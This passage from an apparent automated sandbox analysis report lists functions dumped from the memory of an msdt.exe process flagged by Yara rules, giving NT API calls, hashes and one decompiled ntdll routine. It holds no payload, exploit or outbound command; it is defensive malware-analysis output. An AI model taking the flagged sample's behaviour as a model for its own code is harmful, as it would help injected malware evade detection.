                                                • Opcode ID: 8ea4c278d8c01d0d7a51b24ba96ae4d29ee5e99e2b69e90c0c40fa0a31c51181
                                                • Instruction ID: a996df76591e2ca48206a2d2710b88877f4373f39fae4f45a0244ac5690c7c6a
                                                • Opcode Fuzzy Hash: 8ea4c278d8c01d0d7a51b24ba96ae4d29ee5e99e2b69e90c0c40fa0a31c51181
                                                • Instruction Fuzzy Hash: 0790027520504452D60069695804A87000597D1355F91D421A08246DCD8B948861F161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A99670, Relevance: .0, Instructions: 2COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction ID: 52136c15d3aab1f6733fb2fd338be449371f8bb1510b846c01c6182393b1638e
                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                • Instruction Fuzzy Hash:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00AEFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 53%
                                                			E00AEFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00A9CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00AE5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00AE5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                0x00aefdda
                                                0x00aefde2
                                                0x00aefde5
                                                0x00aefdec
                                                0x00aefdfa
                                                0x00aefdff
                                                0x00aefe0a
                                                0x00aefe0f
                                                0x00aefe17
                                                0x00aefe1e
                                                0x00aefe19
                                                0x00aefe19
                                                0x00aefe19
                                                0x00aefe20
                                                0x00aefe21
                                                0x00aefe22
                                                0x00aefe25
                                                0x00aefe40

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AEFDFA
                                                Strings
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00AEFE2B
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00AEFE01
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.393603113.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                • API String ID: 885266447-3903918235
                                                • Opcode ID: c62887404b00a504eec22f4436bc6d64c21d9a2803774e075893dec808039df1
                                                • Instruction ID: a27d7b6ac9a9e1764dac702059512f4953616293cbc86c691a2b499124d440bb
                                                • Opcode Fuzzy Hash: c62887404b00a504eec22f4436bc6d64c21d9a2803774e075893dec808039df1
                                                • Instruction Fuzzy Hash: 24F02B76600641BFEA201A5ADD02F33BF6AEB84730F240714F628565E1DA62FC3097F0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Analysis Process: msdt.exe PID: 7052 Parent PID: 3440 msdt.exeCOMMON

                                                Executed Functions

                                                Function 007D9D5A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,007D4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,007D4B87,007A002E,00000000,00000060,00000000,00000000), ref: 007D9DAD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID: .z`
                                                • API String ID: 823142352-1441809116
                                                • Opcode ID: 6f7c1f125a4f6b05b8b3e8613dd503a37bdb7517ab6c9ddbba2e95545b684a44
                                                • Instruction ID: 1620dbeb740ddf479c0bd5f98916448b14e20ce0454251c0c61f475f5d9b5ab6
                                                • Opcode Fuzzy Hash: 6f7c1f125a4f6b05b8b3e8613dd503a37bdb7517ab6c9ddbba2e95545b684a44
                                                • Instruction Fuzzy Hash: 0E01DAB2205108BBDB08CF88C895EDB77ADEF8D714F158688BA4D97241D630E811CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 007D9D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,007D4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,007D4B87,007A002E,00000000,00000060,00000000,00000000), ref: 007D9DAD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID: .z`
                                                • API String ID: 823142352-1441809116
                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction ID: 6c24afd7039268ba74ee8788c2963ae6720a85950a03fa83058d9602aae0ddbc
                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                • Instruction Fuzzy Hash: F3F0B2B2200208ABCB08CF88DC95EEB77ADAF8C754F158248BA0D97241C630F8118BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 007D9E8A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtClose.NTDLL( M},?,?,007D4D20,00000000,FFFFFFFF), ref: 007D9EB5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID: M}
                                                • API String ID: 3535843008-2892997435
                                                • Opcode ID: 0e3f9c2017521587f2c9b0f5f3e7365a73a2e9058f1652688f4922f4f99f5404
                                                • Instruction ID: 56c7a1d036ff1ef60d91207f98a9077acdf205c8c283abb30d2e9b9a6dd16428
                                                • Opcode Fuzzy Hash: 0e3f9c2017521587f2c9b0f5f3e7365a73a2e9058f1652688f4922f4f99f5404
                                                • Instruction Fuzzy Hash: 9DE0C235200208BBD710EFE4CC86F977B68EF44B10F058155BA589B242D530FA0087D0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 007D9E90, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtClose.NTDLL( M},?,?,007D4D20,00000000,FFFFFFFF), ref: 007D9EB5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID: M}
                                                • API String ID: 3535843008-2892997435
                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction ID: 5a64b72ef85600b59de0e1f4666cb1dc318ff760c807426da2495c0f98cbe93f
                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                • Instruction Fuzzy Hash: B3D01275200214BBD710EB98CC85E97776CEF44750F154455BA585B242C530F50086E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 007D9E0A, Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,007D4A01,?,?,?,?,007D4A01,FFFFFFFF,?,BM},?,00000000), ref: 007D9E55
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 293bb9453cdb17cad94378a919b07c1d5b417ee36a18e2c385878743a02a47a0
                                                • Instruction ID: 68b6017c9be12ccf26ec0d06f71c1efab7b1cebd3f546618d79fbb40a924f4a2
                                                • Opcode Fuzzy Hash: 293bb9453cdb17cad94378a919b07c1d5b417ee36a18e2c385878743a02a47a0
                                                • Instruction Fuzzy Hash: AAF0E2B6200108ABDB04DFA9DC84EEB77A9FF8C354F058249FA0DA7255D630E8118BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 007D9E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,007D4A01,?,?,?,?,007D4A01,FFFFFFFF,?,BM},?,00000000), ref: 007D9E55
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction ID: d449ecab597864276215ca497382920a726e15e33e9d932689b2aad5169e721c
                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                • Instruction Fuzzy Hash: D4F0A4B2200208ABCB14DF89DC95EEB77ADEF8C754F158249BA1DA7241D630E8118BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 007D9F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,007C2D11,00002000,00003000,00000004), ref: 007D9F79
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                • Instruction ID: df6168fa0d1c6b957de4dc36c636b2933a71f5e39fce23ef80b1a55bab8650d0
                                                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                • Instruction Fuzzy Hash: 96F015B2200208ABCB14DF89CC81EAB77ADEF88750F158149BE08A7241C630F810CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 007D9F3A, Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,007C2D11,00002000,00003000,00000004), ref: 007D9F79
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: 971a1df24cf7771ce165f7dde8c4d715c67a8d1c81f39a90d420e26e17c94d42
                                                • Instruction ID: 2104a01f39cdeb198986ca66873dbbf14069b1da7d6abdd784caf801aa53d68e
                                                • Opcode Fuzzy Hash: 971a1df24cf7771ce165f7dde8c4d715c67a8d1c81f39a90d420e26e17c94d42
                                                • Instruction Fuzzy Hash: ECF0A7B1100149AFCB14EF58DCC5CA7BBB8FF48210B05864DFD5897202C234E425CBE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04D49840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.597891483.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true
                                                • Associated: 00000007.00000002.598814696.0000000004DFB000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.598843723.0000000004DFF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 87b7747212743c6fb9a9e856960d62439b2c809bbcd5784c618a29f30b70795e
                                                • Instruction ID: 6dbbc1bde090bdf8b7e8a842120601c07f9cd1d6d3ff2ad988fe6beb003fbc7f
                                                • Opcode Fuzzy Hash: 87b7747212743c6fb9a9e856960d62439b2c809bbcd5784c618a29f30b70795e
                                                • Instruction Fuzzy Hash: DF900261242041577946B15944045174027E7E4285791C012A5405961C8966E8D6E671
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04D49860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.597891483.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true
                                                • Associated: 00000007.00000002.598814696.0000000004DFB000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.598843723.0000000004DFF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e7ffda01e1a0fb26c7004b935f4314120ce202eaabade2006b41c6b4fbe9a6d5
                                                • Instruction ID: ecd16f8c2f7bce230b2782348d6c73f3ad40cbfa4e5e8f2c1169a1f8aa148745
                                                • Opcode Fuzzy Hash: e7ffda01e1a0fb26c7004b935f4314120ce202eaabade2006b41c6b4fbe9a6d5
                                                • Instruction Fuzzy Hash: 9390027120100417F51261594504717002AD7D4285F91C412A4415569D9A96D9D2B171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04D495D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.597891483.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true
                                                • Associated: 00000007.00000002.598814696.0000000004DFB000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.598843723.0000000004DFF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 54e5959b7c9787f2f07a086800339a1b7eae16f6b52afae5150ad957662fa104
                                                • Instruction ID: 00f3e1c2e6837de69e1660bdec39b919d366f00e9692fb672cc092014966969c
                                                • Opcode Fuzzy Hash: 54e5959b7c9787f2f07a086800339a1b7eae16f6b52afae5150ad957662fa104
                                                • Instruction Fuzzy Hash: 4E9002A120200007650671594414626402BD7E4245B51C021E50055A1DC965D8D17175
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04D499A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.597891483.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true
                                                • Associated: 00000007.00000002.598814696.0000000004DFB000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.598843723.0000000004DFF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a4627f9d31810aa594a675633fbf4b8e6ee1e38ed2c95323fe14a53e2f5aa186
                                                • Instruction ID: d294e41e0e80232f9b66d59f52d87a23cf6bf0d61883b3c0a87b2db262c56762
                                                • Opcode Fuzzy Hash: a4627f9d31810aa594a675633fbf4b8e6ee1e38ed2c95323fe14a53e2f5aa186
                                                • Instruction Fuzzy Hash: 5C9002A134100447F50161594414B160026D7E5345F51C015E5055565D8A59DCD27176
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04D49540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.597891483.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true
                                                • Associated: 00000007.00000002.598814696.0000000004DFB000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.598843723.0000000004DFF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d986fd3006f1585d8be7197b9b0ba70ba7c29c5b9abf246ab0da9c3fc6f1b9f3
                                                • Instruction ID: 74783ead404c26a5a060f4dcd056f52327564153c8e9ecf88320a33247e6b5d0
                                                • Opcode Fuzzy Hash: d986fd3006f1585d8be7197b9b0ba70ba7c29c5b9abf246ab0da9c3fc6f1b9f3
                                                • Instruction Fuzzy Hash: 84900265211000072506A55907045170067D7D9395351C021F5006561CDA61D8E16171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04D49910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.597891483.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true
                                                • Associated: 00000007.00000002.598814696.0000000004DFB000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.598843723.0000000004DFF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e238e4b4f802365cf7b9757f141561ca0ea8a6dc53d6a95da5a7b60269e51894
                                                • Instruction ID: 62360b0bd933b0bfb8432f1b2ed6a2c1c6b37e2c27357c0785e89671665d5c43
                                                • Opcode Fuzzy Hash: e238e4b4f802365cf7b9757f141561ca0ea8a6dc53d6a95da5a7b60269e51894
                                                • Instruction Fuzzy Hash: D29002B120100407F541715944047560026D7D4345F51C011A9055565E8A99DDD576B5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04D496D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.597891483.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true
                                                • Associated: 00000007.00000002.598814696.0000000004DFB000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.598843723.0000000004DFF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: fb21f37aab228afdd01a8f8d234d50ff929964fed531d180563b5789ff0530bd
                                                • Instruction ID: c1b9ca161d4ccfecd86a1e8536d179cfb34b7580754e8feb84c35172ccab61f1
                                                • Opcode Fuzzy Hash: fb21f37aab228afdd01a8f8d234d50ff929964fed531d180563b5789ff0530bd
                                                • Instruction Fuzzy Hash: 9990027120100847F50161594404B560026D7E4345F51C016A4115665D8A55D8D17571
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04D496E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.597891483.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true
                                                • Associated: 00000007.00000002.598814696.0000000004DFB000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.598843723.0000000004DFF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2be27914de118bb0ad3d825abefe4fce91055d8e4cda096968e0d5200109a27d
                                                • Instruction ID: d8adf06b165ffb72afd90bad414ece31c0c7ca0c7a7f6bfb1d9792be74fe888b
                                                • Opcode Fuzzy Hash: 2be27914de118bb0ad3d825abefe4fce91055d8e4cda096968e0d5200109a27d
                                                • Instruction Fuzzy Hash: 4690027120108807F5116159840475A0026D7D4345F55C411A8415669D8AD5D8D17171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04D49A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.597891483.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true
                                                • Associated: 00000007.00000002.598814696.0000000004DFB000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.598843723.0000000004DFF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 17556edda7149db2769eda6447887e24bbec9c94a129c0c6e96f8aa6e0dc9135
                                                • Instruction ID: 678e5ff29de4419d81ed4e8c58f397f997e24d9ee2ca0b6bec75fb2a486490cd
                                                • Opcode Fuzzy Hash: 17556edda7149db2769eda6447887e24bbec9c94a129c0c6e96f8aa6e0dc9135
                                                • Instruction Fuzzy Hash: 6C90026121180047F60165694C14B170026D7D4347F51C115A4145565CCD55D8E16571
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04D49650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.597891483.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true
                                                • Associated: 00000007.00000002.598814696.0000000004DFB000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.598843723.0000000004DFF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: cfee98613dfc7d0e367408bd912b0490b5f48effff9a54da8d2384d121e5aa08
                                                • Instruction ID: 3a22d37f3bbff2eecedebd2c10c79bfdfb9e353ba3963fe656421bd3b1f2cb46
                                                • Opcode Fuzzy Hash: cfee98613dfc7d0e367408bd912b0490b5f48effff9a54da8d2384d121e5aa08
                                                • Instruction Fuzzy Hash: E790027120504847F54171594404A560036D7D4349F51C011A40556A5D9A65DDD5B6B1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04D49660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.597891483.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true
                                                • Associated: 00000007.00000002.598814696.0000000004DFB000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.598843723.0000000004DFF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 0ac2f52a4312ae0cccc7f0043349c7658561dcee14db1e875a53744a16e59e68
                                                • Instruction ID: 9faa4b3342f91cb134115a259af19eaa3f2cd709fb96001501cef6aa86e0f1a5
                                                • Opcode Fuzzy Hash: 0ac2f52a4312ae0cccc7f0043349c7658561dcee14db1e875a53744a16e59e68
                                                • Instruction Fuzzy Hash: E290027120100807F5817159440465A0026D7D5345F91C015A4016665DCE55DAD977F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04D49FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.597891483.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true
                                                • Associated: 00000007.00000002.598814696.0000000004DFB000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.598843723.0000000004DFF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: aed352d677f879a9c844830a00e70e49314be865b52c01c975c0f6dd8ccc09d8
                                                • Instruction ID: 10755118722a2e3d5213c788cd90b96d36164c992c762abdc5c94ec74176c91c
                                                • Opcode Fuzzy Hash: aed352d677f879a9c844830a00e70e49314be865b52c01c975c0f6dd8ccc09d8
                                                • Instruction Fuzzy Hash: 4D90027131114407F511615984047160026D7D5245F51C411A4815569D8AD5D8D17172
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04D49780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.597891483.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true
                                                • Associated: 00000007.00000002.598814696.0000000004DFB000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.598843723.0000000004DFF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: eeb4bbc97ce30020a58a72487ccd2dca6f1a475e3618d536b77851531f459ef3
                                                • Instruction ID: c3f7c06d942f6fa1c765aab8419422451e59b0cde29e12033910affab092733e
                                                • Opcode Fuzzy Hash: eeb4bbc97ce30020a58a72487ccd2dca6f1a475e3618d536b77851531f459ef3
                                                • Instruction Fuzzy Hash: 3190026921300007F5817159540861A0026D7D5246F91D415A4006569CCD55D8E96371
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04D49710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.597891483.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true
                                                • Associated: 00000007.00000002.598814696.0000000004DFB000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.598843723.0000000004DFF000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e1eae3d24c29f68b416d19c762311a9cb023d6efcd1a1a4e2801be0a6bccdb08
                                                • Instruction ID: 405ce9e05903a509f87b6b5bef32a93de508473e3a3440ffe6465f07eef14117
                                                • Opcode Fuzzy Hash: e1eae3d24c29f68b416d19c762311a9cb023d6efcd1a1a4e2801be0a6bccdb08
                                                • Instruction Fuzzy Hash: 7590027120100407F501659954086560026D7E4345F51D011A9015566ECAA5D8D17171
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 007DA070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,007C3AF8), ref: 007DA09D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: .z`
                                                • API String ID: 3298025750-1441809116
                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction ID: 0a4806b39628ec2431fb4ffba18eb8f7cfbdad3ef4752b251e5faba02e6c44f6
                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                • Instruction Fuzzy Hash: 98E01AB1200208ABD714DF59CC49EA777ACEF88750F018555B90857241C630F9108AB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 007C82EA, Relevance: 3.1, APIs: 2, Instructions: 57threadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 007C834A
                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 007C836B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.595686544.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: d805ba1e46ef74495d7e40f55282b07c402c5ca3b5094a973425aca124e70bdd
                                                • Instruction ID: 7bfaed859d12b3bd02d57cc42606465e574e1a1675d16a8e08fb99b1a0009bd8
